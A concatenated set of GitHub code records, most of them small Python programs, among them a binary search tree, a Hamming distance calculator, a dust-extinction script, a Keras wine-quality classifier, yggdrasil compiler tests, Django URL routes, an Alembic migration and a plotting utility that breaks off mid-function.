else:\n                return self.find_max(root.right)\n\n    def find_min(self,root):\n        if root == None:\n            return None\n        else:\n            if root.left == None:\n                return root\n            else:\n                return self.find_min(root.left)\n\n    def judge_bst(self,root):\n        if root == None :\n            return True\n        if root.left != None and self.find_max(root.left).data > root.data:\n            return False\n        if root.right != None and self.find_min(root.right).data < root.data:\n            return False\n\n        if self.judge_bst(root.left) == False or self.judge_bst(root.right) == False:\n            return False\n        return True\n\n    def delete(self, root, data):\n        \"\"\"delete data from the tree\"\"\"\n        flag, node, parent = self.search(root, root, data)\n        if flag is False:\n            print(\"The data is not in the tree, delete failed!\")\n        else:\n            if node.left is None:\n                if node == parent.left:\n                    parent.left = node.right\n                else:\n                    parent.right= node.right\n                del parent\n            elif node.right is None:\n                if node == parent.left:\n                    parent.left = node.left\n                else:\n                    parent.right= node.left\n                del parent\n            else: # Left and right subtrees are not empty\n                pre = node.right\n                if pre.left is None:\n                    node.data = pre.data\n                    node.right= pre.right\n                    del pre\n                else:\n                    next = pre.left\n                    while next.left is not None:\n                        pre = next\n                        next = next.left\n                    node.data = next.data\n                    pre.left = next.right\n                    del parent\n\n    def array_to_bst(self,array,left,right):\n        if left > right :\n            return None\n        node = Node(None)\n        if left == right:\n            node.data = array[left]\n            node.left = None\n            node.right = None\n        else:\n            mid = int(left + int((right-left)/2))\n            node.data = array[mid]\n            node.left = self.array_to_bst(array,left,mid-1)\n            node.right = self.array_to_bst(array,mid + 1,right )\n\n        return node\n\n\n    def preorder(self,root):\n        if root is None:\n            return []\n        result = [root.data]\n        left_data = self.preorder(root.left)\n        right_data = self.preorder(root.right)\n        return result + left_data + right_data\n\n    def inorder(self,root):\n        if root is None:\n            return []\n        result = [root.data]\n        left_data = self.inorder(root.left)\n        right_data = self.inorder(root.right)\n        return left_data + result + right_data\n\n    def postorder(self,root):\n        if root is None:\n            return []\n        result = [root.data]\n        left_data = self.postorder(root.left)\n        right_data = self.postorder(root.right)\n        return 
left_data + right_data + result\n\n    \nif __name__ == '__main__':\n\n    Tree = BinarySearchTree()\n    for i in range(20):\n        Tree.insert(i)\n    print(Tree.inorder(Tree.root))\n    \n    Tree.delete(Tree.root, 9)\n    print(Tree.inorder(Tree.root))\n    print(Tree.find_max(Tree.root).data)\n    print(Tree.find_min(Tree.root).data)\n    #print(Tree.judge_bst(Tree.root))","repo_name":"chenshuo666/cs_data_structure_algorithms","sub_path":"cs_data_structure_and_algorithms/tree/tree_category/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} {"seq_id":"7499632689","text":"\n# n1 = int(input(\"Enter the first number in binary (0s and 1s): \"),2)\n# n2 = int(input(\"Enter the second number, also in binary (0s and 1s): \"),2)\n# res = bin(n1^n2).replace(\"0b\",\"\")\n# print(res.count('1'))\ndef binarytodecimal(n):\n    l=len(n)\n    res=n[: : -1]\n    result=0\n    for i in range(l):\n        result+=int(res[i])*pow(2,i)\n    return result\n\ndef decimaltobinary(n):\n    if(n<2):\n        return str(n)\n    ans = decimaltobinary(n//2)\n    return ans + str(n%2)\n\nn1 = input(\"Enter the first number in binary (0s and 1s): \")\nn2 = input(\"Enter the second number in binary (0s and 1s): \")\ndec_n1=binarytodecimal(n1)\ndec_n2=binarytodecimal(n2)\n\nres_dec=dec_n1^dec_n2\nres_bin= decimaltobinary(res_dec)\ncount=0\nfor i in res_bin:\n    if(i=='1'):\n        count+=1\nprint(\"hamming distance= \",count)\n\n\n","repo_name":"Ravi-0412/Network-Lab-program","sub_path":"External_Q/hamming_distance.py","file_name":"hamming_distance.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"30675306165","text":"import argparse\nimport os\nfrom bin2vec.process_binary_for_graph import Graph\nfrom neural_models.data_processing.parse_graphs_for_gcn import GCN\n\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('binary', help='path to binary folder')\n    args = parser.parse_args()\n    binary_folder = args.binary\n    graphs = []\n    labels = []\n    ################################################\n    # create bin2vec graphs from cfg\n    for root, dirs, files in os.walk(binary_folder):\n        for file in files:\n            full_path = os.path.join(root, file)\n            bin2vec_graph = Graph(full_path)\n            if 'bad' in full_path:\n                graphs.append(bin2vec_graph)\n                labels.append(1)\n            elif 'good' in full_path:\n                graphs.append(bin2vec_graph)\n                labels.append(0)\n    #################################################\n    # preprocess the data and train using gcn\n    gcn = GCN(graphs, labels)\n    adj , fea , one = gcn.preprocess()\n    gcn.train_gcn(adj, fea, one)\n    \n\n\n    \n\n\n","repo_name":"usc-isi-bass/binary_analysis","sub_path":"run_bin2vec.py","file_name":"run_bin2vec.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} {"seq_id":"19491165671","text":"from PIL import Image, ImageDraw\n\ndef clear_all(canvas, background):\n    draw = ImageDraw.Draw(canvas)\n    background = background.resize((240,240))\n    canvas.paste(background,(0,0))\n\ndef crash(obj1, obj2):\n    x1 = obj1.x; y1 = obj1.y; w1 = obj1.width; h1 = obj1.height;\n    x2 = obj2.x; y2 = obj2.y; w2 = obj2.width; h2 = obj2.height;\n\n    if(x1 < x2 + w2 and x1 + w1 > x2 and y1 + h1 > y2 and y1 < y2 + h2):\n        return True\n    else:\n        return 
False\n","repo_name":"suheoon/doge-game","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16293557420","text":"import numpy as np\nimport pandas as pd\n\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nfrom dustmaps.bayestar import BayestarWebQuery\ndef distance_parallax(x):\n return abs(1000/x)\ndf1 = pd.read_csv(r\"lowmass_sdss_2mass_wise_gaia.csv\",nrows=800000)\n#df_2=pd.read_csv(r\"lowmass_sdss_2mass_wise_gaia.csv\",skiprows=800000)\n\n\nprint(\"read file\")\nra_csv = df1['ra']\ndec_csv = df1['dec_']\nrmag_observe = df1['rmag']\nimag_observe = df1['imag']\nzmag_observe = df1['zmag']\nJmag_observe = df1['Jmag']\nHmag_observe = df1['Hmag']\nKmag_observe = df1['Kmag']\nW1mag_observe = df1['W1mag']\nW2mag_observe = df1['W2mag']\nW3mag = df1['W3mag']\nW4mag = df1['W4mag']\ne_rmag = df1['e_rmag']\ne_imag = df1['e_imag']\ne_zmag = df1['e_zmag']\ne_Jmag = df1['e_Jmag']\ne_Hmag = df1['e_Hmag']\ne_Kmag = df1['e_Kmag']\ne_W1mag = df1['e_W1mag']\ne_W2mag = df1['e_W2mag']\ne_W3mag = df1['e_W3mag']\ne_W4mag = df1['e_W4mag']\nid = df1['id']\nab_i = df1['ad_i']\nparallax = df1['parallax']\ndistance_ = df1['distance']\npm = df1['pm']\ndistance = df1['parallax'].map(distance_parallax)\nra_deg = ra_csv * u.deg\ndec_deg = dec_csv * u.deg\ndistance_pc = distance * u.pc\n# b0 = [10., 12., -25.]\n# l0=[90., 150., 35.]\n# data={\n# \"ra\":l0,\n# \"dec\":b0,\n# }\n# df=pd.DataFrame(data)\n# myvar_l=df['ra']\n# l = myvar_l* u.deg\n# myvar_b=df['dec']\n# b = myvar_b* u.deg\n# d = [500., 3500., 1000.] * u.pc\n# print(type(l0))\n# distance=d,\nprint(\"variable\")\ncoords = SkyCoord(ra_deg, dec_deg, distance=distance_pc, frame='icrs')\nq = BayestarWebQuery(version='bayestar2015')\nE = q(coords, mode='mean')\n# imag=imag_o E*1.971\n# print(E)\nprint(\"dustmap\")\nEpandas = pd.Series(E.tolist())\nEpandas.fillna(0, inplace=True)\nrmag = rmag_observe - Epandas * 2.31\nimag = imag_observe - Epandas * 1.71\nzmag = zmag_observe - Epandas * 1.29\nJmag = Jmag_observe - Epandas * 0.72\nHmag = Hmag_observe - Epandas * 0.46\nKmag = Kmag_observe - Epandas * 0.306\nW1mag = W1mag_observe - Epandas * 0.18\nW2mag = W2mag_observe - Epandas * 0.16\nprint(\"calculate\")\nextinc_mag = pd.concat(\n [rmag, imag, zmag, Jmag, Hmag, Kmag, W1mag, W2mag, W3mag, W4mag], axis=1)\n # imag_ndarray=np.array(imag)\n\n# ra_csv, dec_csv, , e_rmag, e_imag, e_zmag,\n# e_Jmag, e_Hmag, e_Kmag, e_W1mag, e_W2mag, e_W3mag, e_W4mag, rmag - imag, imag - zmag, zmag - Jmag, Jmag - Hmag,\n# Hmag - Kmag, Kmag - W1mag, W1mag - W2mag, W2mag - W3mag, W3mag - W4mag, rmag - zmag, imag - Jmag, zmag - Hmag,\n# Jmag - Kmag, Hmag - W1mag, Kmag - W2mag, W1mag - W3mag, W2mag - W4mag, rmag - Jmag, imag - Hmag, zmag - Kmag,\n# Jmag - W1mag, Hmag - W2mag, Kmag - W3mag, W1mag - W4mag, rmag - Hmag, imag - Kmag, zmag - W1mag, Jmag - W2mag,\n# Hmag - W3mag, Kmag - W4mag, rmag - Kmag, imag - W1mag, zmag - W2mag, Jmag - W3mag, Hmag - W4mag, rmag - W1mag,\n# imag - W2mag, zmag - W3mag, Jmag - W4mag, rmag - W2mag, imag - W3mag, zmag - W4mag, rmag - W3mag, imag - W4mag,\n# rmag - W4mag, id, ab_i, parallax, distance_, pm\n\n#df1head=df1.head(5)\n# extinc_mag_1=dustmapsql(df_1)\n# extinc_mag_2=dustmapsql(df_2)\n# extinc_mag=pd.concat([extinc_mag_1,extinc_mag_2],axis=1)\n# 
print(type(E))\n#print(E)\n#print(imag_ndarray)\n#np.savetxt('Extinction.csv',E,fmt=\"%f\",delimiter=',')\n#np.savetxt('imag_in.csv',imag_ndarray,fmt=\"%f\",delimiter=',')\nnp.savetxt('lowmass_sdss_2mass_wise_gaia_extinc.csv',extinc_mag,fmt=\"%f\",delimiter=',')","repo_name":"haifengchengguang/extinction","sub_path":"145w.py","file_name":"145w.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"34329420938","text":"# Write a program that removes from the text every word containing \"абв\"\n\ntext = 'Дорогие друзья, дальнейшее развитие различных форм деятельности обеспечивает \\\n    широкому кругу абвспециалистов участиеабв в формировании новых предложений? Не следует, однако,\\\n    забывать о том, что реализация намеченного плана развитияабв требует от нас анализа дальнейших \\\n    направленийабв развития проекта.'\n\nfind_txt = \"абв\"\nlst = [i for i in text.split() if find_txt not in i]\nprint(' '.join(lst))","repo_name":"lplnt/python_home_work-","sub_path":"h_w_5/h_w_5.1.py","file_name":"h_w_5.1.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"71898232161","text":"import pandas as pd\nimport numpy as np\n\nwine_df = pd.read_csv('C:/data/csv/winequality-white.csv', sep=';')\n\n'''\n########## EDA ##############\nprint(wine_df)\nprint(wine_df.columns)\n# [4898 rows x 12 columns]\n# Index(['fixed acidity', 'volatile acidity', 'citric acid', 'residual sugar',\n#        'chlorides', 'free sulfur dioxide', 'total sulfur dioxide', 'density',\n#        'pH', 'sulphates', 'alcohol', 'quality'],\n#       dtype='object')\nprint(np.unique(wine_df.iloc[:,11]))\n# [3 4 5 6 7 8 9] # quality categories\n\n# df_check = wine_df.isnull().values.any()\n# print(df_check)\n# False # no missing values\n\n#############################\n'''\n\nwine_np = wine_df.to_numpy()\n# print(wine_np)\n# print(wine_np.shape)\n\nX = wine_np[:, :-1]\ny = wine_np[:, -1]\ny = y.astype(np.int64)\n# print(X.shape) # (4898, 11)\n# print(y.shape) # (4898,)\n# print(y)\n# print(np.unique(y))\n\n# 7-class classification\n# preprocessing\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler, RobustScaler, OneHotEncoder, LabelBinarizer\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.tree import ExtraTreeClassifier\n\nlb = LabelBinarizer()\ny = lb.fit_transform(y)\n# print(y[0])\n\nX_train, X_test, y_train, y_test = train_test_split(\n    X, y, train_size=0.8, random_state=66\n)\nscaler = MinMaxScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n#############################################\n\n'''\n####### modeling ###########\nclf = ExtraTreeClassifier()\nclf.fit(X_train, y_train)\n\naaa = clf.score(X_test, y_test)\nprint(\"model.score :\", aaa)\n############################\n'''\n\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, LSTM, Input\n\nmodel = Sequential()\nmodel.add(Dense(10, activation='relu', input_shape=(11,)))\nmodel.add(Dense(20))\nmodel.add(Dense(7, activation='softmax'))\n\n#3. 
compile and fit\nfrom tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau\nes = EarlyStopping(monitor='val_loss', patience=10, mode='auto')\nre = ReduceLROnPlateau(patience=5, verbose=1)\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\nmodel.fit(X_train, y_train, epochs=1000, batch_size=4, callbacks=[es, re], validation_split=0.2)\n\n#4. evaluate and predict\nloss = model.evaluate(X_test, y_test, batch_size=4)\nprint(\"loss :\", loss)\n\ny_pred = model.predict(X_test)\nprint(\"y_predict :\", y_pred)\n\n\n\n\n\n","repo_name":"biggymart/study","sub_path":"ML/m48_wine_quality_mine.py","file_name":"m48_wine_quality_mine.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40163514393","text":"import re\n\nfrom collections import defaultdict\n\n\ndef count_of_atoms(formula):\n criterion = r'([A-Z]{1}[a-z]?|\\(|\\)|\\d+)'\n stack = []\n tokens = list(filter(lambda c: c, re.split(criterion, formula)))\n count = defaultdict(int)\n i = 0\n\n while i < len(tokens):\n token = tokens[i]\n if token == '(':\n stack.append(count)\n stack.append(token)\n count = defaultdict(int)\n elif token == ')':\n tmp = stack.pop()\n while tmp != '(':\n for k, v in tmp.items():\n count[k] += v\n tmp = stack.pop()\n elif token.isdigit():\n if tokens[i - 1] == ')':\n for k, v in count.items():\n count[k] = v * int(token)\n else:\n count[tokens[i - 1]] += int(token) - 1\n else:\n count[token] += 1\n i += 1\n while stack:\n tmp = stack.pop()\n for k, v in tmp.items():\n count[k] += v\n\n sorted_count = sorted(count.items(), key=lambda x: x[0])\n result = ''\n\n for k, v in sorted_count:\n result += k\n if v != 1:\n result += str(v)\n\n return result\n\n\nprint(count_of_atoms('K4(ON(SO3)2)2'))","repo_name":"kavurisrikanth/competitive_programming","sub_path":"Week 4/Exam/NumAtoms.py","file_name":"NumAtoms.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16045606543","text":"import os\nimport unittest\nfrom yggdrasil import platform, tools\nfrom yggdrasil.tests import scripts, assert_raises, assert_equal\nimport yggdrasil.drivers.tests.test_ModelDriver as parent\nfrom yggdrasil.drivers.GCCModelDriver import (\n GCCModelDriver, get_zmq_flags, get_ipc_flags, get_flags,\n build_datatypes, build_api, build_regex_win32)\n\n\n_driver_installed = GCCModelDriver.is_installed()\n\n\ndef test_get_zmq_flags():\n r\"\"\"Test get_zmq_flags.\"\"\"\n cc, ld = get_zmq_flags()\n if not tools.is_comm_installed('ZMQComm', language='c'):\n assert_equal(len(cc), 0)\n assert_equal(len(ld), 0)\n\n\ndef test_get_ipc_flags():\n r\"\"\"Test get_ipc_flags.\"\"\"\n cc, ld = get_ipc_flags()\n if not tools.is_comm_installed('IPCComm', language='c'): # pragma: windows\n assert_equal(len(cc), 0)\n assert_equal(len(ld), 0)\n\n\ndef test_get_flags():\n r\"\"\"Test get_flags.\"\"\"\n cc, ld = get_flags()\n if not _driver_installed: # pragma: windows\n assert_equal(len(cc), 0)\n assert_equal(len(ld), 0)\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\ndef test_build_shared():\n r\"\"\"Test building libraries as shared.\"\"\"\n if platform._is_win: # pragma: windows\n build_regex_win32(overwrite=True)\n build_datatypes(as_shared=False, overwrite=True)\n build_datatypes(as_shared=True, overwrite=True)\n build_api(cpp=False, as_shared=True, overwrite=True)\n build_api(cpp=True, 
as_shared=True, overwrite=True)\n    build_api(cpp=True, as_shared=True, overwrite=False)\n\n\n@unittest.skipIf(_driver_installed, \"C Library installed\")\ndef test_GCCModelDriver_no_C_library(): # pragma: windows\n    r\"\"\"Test GCCModelDriver error when C library not installed.\"\"\"\n    assert_raises(RuntimeError, GCCModelDriver, 'test', scripts['c'])\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\ndef test_GCCModelDriver_errors():\n    r\"\"\"Test GCCModelDriver errors.\"\"\"\n    assert_raises(RuntimeError, GCCModelDriver, 'test', 'test.py')\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\nclass TestGCCModelParam(parent.TestModelParam):\n    r\"\"\"Test parameters for GCCModelDriver.\"\"\"\n\n    driver = 'GCCModelDriver'\n    \n    def __init__(self, *args, **kwargs):\n        super(TestGCCModelParam, self).__init__(*args, **kwargs)\n        self.attr_list += []\n        src = scripts['c']\n        script_dir = os.path.dirname(src[0])\n        if platform._is_win: # pragma: windows\n            self.args = src + ['1', '-I' + script_dir, '/link', '-L' + script_dir]\n        else:\n            self.args = src + ['1', '-I' + script_dir, '-L' + script_dir]\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\nclass TestGCCModelDriverNoStart(TestGCCModelParam,\n                                parent.TestModelDriverNoStart):\n    r\"\"\"Test runner for GCCModelDriver without start.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        # Version to run C++ example\n        super(TestGCCModelDriverNoStart, self).__init__(*args, **kwargs)\n        src = scripts['cpp']\n        script_dir = os.path.dirname(src[0])\n        if platform._is_win: # pragma: windows\n            self.args = src + ['1', '-I' + script_dir, '/link', '-L' + script_dir,\n                               '/out:test_exe.exe']\n        else:\n            self.args = src + ['1', '-I' + script_dir, '-L' + script_dir,\n                               '-o', 'test_exe']\n    \n    # Done in driver, but driver not started\n    def teardown(self):\n        r\"\"\"Remove the instance, stopping it.\"\"\"\n        self.instance.cleanup()\n        super(TestGCCModelDriverNoStart, self).teardown()\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\nclass TestGCCModelDriverNoStart_std(TestGCCModelDriverNoStart):\n    r\"\"\"Test runner for GCCModelDriver with std lib specified.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super(TestGCCModelDriverNoStart_std, self).__init__(*args, **kwargs)\n        self.args.append('-std=c++11')\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\nclass TestGCCModelDriver(TestGCCModelParam, parent.TestModelDriver):\n    r\"\"\"Test runner for GCCModelDriver.\"\"\"\n\n    pass\n","repo_name":"ritviksahajpal/yggdrasil","sub_path":"yggdrasil/drivers/tests/test_GCCModelDriver.py","file_name":"test_GCCModelDriver.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} {"seq_id":"16776248262","text":"from django.utils.translation import gettext_lazy as _\nfrom django.conf.urls import url, include\n\nfrom olc_webportalv2.vir_typer import views\n\n# app_name = 'vir_typer'\nurlpatterns = [\n    # Vir_typer Stuff\n    url(r'^$', views.vir_typer_home, name='vir_typer_home'),\n    url(_(r'^create/'), views.vir_typer_request, name='vir_typer_request'),\n    url(_(r'^upload/(?P\\d+)/$'), views.vir_typer_upload, name='vir_typer_upload'),\n    url(_(r'^results/(?P\\d+)/$'), views.vir_typer_results, name='vir_typer_results'),\n    url(_(r'^edit/(?P\\d+)/$'), views.vir_typer_rename, name='vir_typer_rename'),\n    # url(r'^processing/(?P\\d+)/$', views.vir_typer_processing, name='vir_typer_processing')\n    # 
url(r'^geneseekr_query/', views.geneseekr_query, name='geneseekr_query'),\n    # url(r'^geneseekr_processing/(?P\\d+)/$', views.geneseekr_processing, name='geneseekr_processing'),\n    # url(r'^geneseekr_results/(?P\\d+)/$', views.geneseekr_results, name='geneseekr_results'),\n    # url(r'^geneseekr_name/(?P\\d+)/$', views.geneseekr_name, name='geneseekr_name'),\n\n]\n","repo_name":"OLC-Bioinformatics/olc_genomics_portal","sub_path":"olc_webportalv2/vir_typer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} {"seq_id":"30343782369","text":"# This program prints a random fruit from a defined set \n# Author Alec Reid 18/04/2023\n\nimport random\nfruits = ['Apple', 'Tomato', 'Kiwi', 'Pineapple']\n\nindex = random.randint (0, len (fruits) -1)\n\nfruit = fruits[index] \nprint(\"A random fruit is: {}\".format(fruit)) ","repo_name":"PectenMaximus/Pands-Problem-Sheet","sub_path":"randomfruit.py","file_name":"randomfruit.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"15704041162","text":"\"\"\"topic add chart filed\n\nRevision ID: addc83e6c855\nRevises: 0db4d63e3ba7\nCreate Date: 2017-05-13 22:13:14.514075\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'addc83e6c855'\ndown_revision = '0db4d63e3ba7'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('topics', sa.Column('chart', sa.String(length=64), nullable=True))\n    op.add_column('topics', sa.Column('chart_clfs', sa.Integer(), nullable=True))\n    op.create_unique_constraint(None, 'topics', ['name'])\n    op.create_unique_constraint(None, 'topics', ['chart'])\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_constraint(None, 'topics', type_='unique')\n    op.drop_constraint(None, 'topics', type_='unique')\n    op.drop_column('topics', 'chart_clfs')\n    op.drop_column('topics', 'chart')\n    # ### end Alembic commands ###\n","repo_name":"Zjianglin/proPredictor","sub_path":"migrations/versions/addc83e6c855_topic_add_chart_filed.py","file_name":"addc83e6c855_topic_add_chart_filed.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"3466865321","text":"# Lab 2-2-1 question 7\r\n# By Julan Ray Avila Gutierrez, jra0108@arastudent.ac.nz\r\n\r\nNEWZEALAND_COUNRTYCODE = \"NZ\"\r\nAUSTRALIA_COUNTRYCODE = \"AU\"\r\nNEWZEALAND_CURRENCY = \"NZD\"\r\nAUSTRALIA_CURRENCY = \"AUD\"\r\n\r\nuser_name = input(\"Please enter your first name: \").strip().capitalize()\r\nexchange_rate = float(input(f\"Hi {user_name}. 
Please enter the\\\r\n {NEWZEALAND_COUNRTYCODE}/{AUSTRALIA_COUNTRYCODE} exchange rate: \"))\r\nnzd_money = float(input(f\"Please enter the amount of {NEWZEALAND_COUNRTYCODE} $'s you want to exchange: \"))\r\n\r\naus_money = (exchange_rate) * nzd_money\r\n \r\n#output \r\nprint(f\"{user_name}, I can exchange {nzd_money:.2f} {NEWZEALAND_CURRENCY}\\\r\n into {aus_money:.2f} {AUSTRALIA_CURRENCY} for you.\")\r\n","repo_name":"J-RAG/DTEC501-Python-Files","sub_path":"Lab 2-2-1qs7.py","file_name":"Lab 2-2-1qs7.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"22488081218","text":"import os\r\nfrom random import randrange\r\nimport matplotlib.lines as mlines\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom keras.utils.vis_utils import plot_model\r\nimport syndalib.drawer as sydraw\r\nimport syndalib.linalg as syla\r\nfrom utils.enums import ClassValues\r\nfrom utils.vandermonde import get_vandermonde_matrix\r\n\r\n\r\ndef get_rc(model_index):\r\n    \"\"\"\r\n    0 --> 0,1\r\n    1 --> 1,0\r\n    2 --> 1,1\r\n    3 --> 2,1\r\n\r\n    :param model_index: index of the model in the pic ( from 0 to num_models -1)\r\n    :return: row and column index of axs that refer to the plotting of that particular model\r\n    \"\"\"\r\n    num = model_index + 1\r\n    row = int(np.floor(num / 2.0))\r\n    col = num - 2 * row\r\n    return row, col\r\n\r\n\r\ndef plot_multi_model_sample(i_sample,\r\n                            sample_xy,\r\n                            sample_preds: np.ndarray,\r\n                            path: str,\r\n                            plot: bool,\r\n                            plot_predicted_models: bool,\r\n                            vander,\r\n                            heatmaps=True):\r\n    \"\"\"\r\n    :param sample_xy: (num points per sample, num coordinates=2)\r\n    :param sample_preds: (num points per sample, num models)\r\n    :param path: name of img folder\r\n    :param plot: bool, if true plots otherwise not\r\n    :param plot_predicted_models: bool, if true plots the predicted models along with the heatmaps\r\n    :param vander: IT SHOULD BE (npps, num monomials), but it's (ns, npps, num monomials) np.array vandermonde matrix of the sample\r\n    :param heatmaps:\r\n\r\n    :return:\r\n    \"\"\"\r\n\r\n    plt.clf()\r\n    color_outliers = \"tab:grey\"\r\n    colors = [\r\n        \"tab:orange\",\r\n        \"tab:green\",\r\n        \"tab:blue\",\r\n        \"tab:pink\",\r\n        \"tab:red\",\r\n        \"tab:brown\",\r\n    ]\r\n    assert len(sample_xy) == len(sample_preds)\r\n    num_points_per_sample = sample_preds.shape[0]\r\n    num_models = sample_preds.shape[1]\r\n\r\n    if not heatmaps:\r\n        for i in range(num_models):\r\n            inliers = [\r\n                sample_xy[j]\r\n                for j in range(num_points_per_sample)\r\n                if sample_preds[j, i] < 0.5\r\n            ]\r\n            if len(inliers) > 0:\r\n                plt.scatter(*zip(*inliers), s=10)\r\n        # compute outliers as points that are classified as outliers for all models\r\n        outliers = [\r\n            sample_xy[j]\r\n            for j in range(num_points_per_sample)\r\n            if all(sample_preds[j, :] > 0.5)\r\n        ]\r\n        plt.scatter(*zip(*outliers), s=10)\r\n\r\n    if heatmaps:\r\n        ### first ax for all models together, the remaining for single ones.\r\n        fig, axs = plt.subplots(\r\n            int(np.ceil((num_models + 1) / 2.0)), 2, figsize=(10, 10), squeeze=False\r\n        )\r\n        fig.suptitle(\"Sample's Plot\", fontsize=\"xx-large\")\r\n        for ax in fig.get_axes():\r\n            ax.label_outer()\r\n\r\n        # plot entire sample (every model + outliers)\r\n        axs[0][0].set_aspect(\"equal\", \"datalim\")\r\n        axs[0][0].set_title(\"all models and outliers\")\r\n        model_markers = []\r\n        for i in range(num_models):\r\n            model_marker = mlines.Line2D(\r\n                [],\r\n                [],\r\n                color=colors[i],\r\n                marker=\".\",\r\n                
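# this Line2D draws a marker only (no line), so it serves purely as a legend proxy for the model's colour\r\n                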
linestyle=\"None\",\r\n markersize=10,\r\n label=\"model\" + str(i + 1),\r\n )\r\n model_markers.append(model_marker)\r\n inliers = [sample_xy[j] for j in range(num_points_per_sample) if sample_preds[j, i] < 0.5]\r\n # inliers = [sample_xy[j] for j in range(num_points_per_sample) if tf.less(sample_preds[j, i], 0.5)]\r\n if len(inliers) > 0:\r\n axs[0][0].scatter(*zip(*inliers), c=colors[i], s=10)\r\n # compute outliers as points that are classified as outliers for all models\r\n outliers = [\r\n sample_xy[j]\r\n for j in range(num_points_per_sample)\r\n if all(sample_preds[j, :] >= 0.5)\r\n ]\r\n if len(outliers) > 0:\r\n axs[0][0].scatter(*zip(*outliers), c=color_outliers, s=10)\r\n\r\n outliers_marker = mlines.Line2D([], [], color=color_outliers, marker=\".\", linestyle=\"None\", markersize=10, label=\"outliers\")\r\n\r\n model_markers.append(outliers_marker)\r\n axs[0][0].legend(handles=model_markers, loc=\"upper right\")\r\n\r\n # plot each model separately\r\n for i in range(num_models):\r\n r, c = get_rc(i)\r\n inliers_prob = 1.0 - sample_preds[:, i]\r\n axs[r][c].set_title(\"model \" + str(r * 2 + c))\r\n axs[r][c].set_aspect(\"equal\", \"datalim\")\r\n sc = axs[r][c].scatter(*zip(*sample_xy), c=inliers_prob, s=10, vmin=0, vmax=1)\r\n\r\n if plot_predicted_models:\r\n predicted_coefs = syla.dlt_coefs(vander, inliers_prob, returned_type=\"numpy\")\r\n\r\n # hard coding case circle case!\r\n a = predicted_coefs[0]\r\n b = 0\r\n cc = predicted_coefs[0]\r\n d = predicted_coefs[1]\r\n e = predicted_coefs[2]\r\n f = predicted_coefs[3]\r\n coefs = [a, b, cc, d, e, f]\r\n cx, cy = sydraw.conic_points(coefs=coefs,\r\n x_range=(-2, 2),\r\n y_range=(-2, 2),\r\n resolution=2000) # maybe it's useless to specify ranges\r\n axs[r][c].scatter(cx, cy, s=1, c=\"tab:purple\")\r\n\r\n cbar = plt.colorbar(sc, ax=axs[r][c])\r\n cbar.set_label(\"inlier probability\")\r\n\r\n # save image\r\n os.makedirs(path, exist_ok=True)\r\n title = path + \"/\" + str(i_sample) + \".png\"\r\n plt.savefig(title)\r\n\r\n if plot is True:\r\n plt.show()\r\n\r\n\r\ndef plot_multi_model_predictions(predictions, xy, path, plot: bool, plot_predicted_models: bool):\r\n \"\"\"\r\n\r\n :param predictions: (bs, num points per sample, num models) predictions\r\n :param xy: (bs, num points per sample, 1, num coords) points coordinates\r\n :param path: path of the folder in which to save imgs\r\n :param plot: bool, if true plots and saves img otherwise just saves img\r\n :param plot_predicted_models: bool, if true plots along with the inliers probability the predicted model\r\n :return:\r\n \"\"\"\r\n if plot_predicted_models:\r\n nm = predictions.shape[-1]\r\n n_coords = xy.shape[-1]\r\n vanders 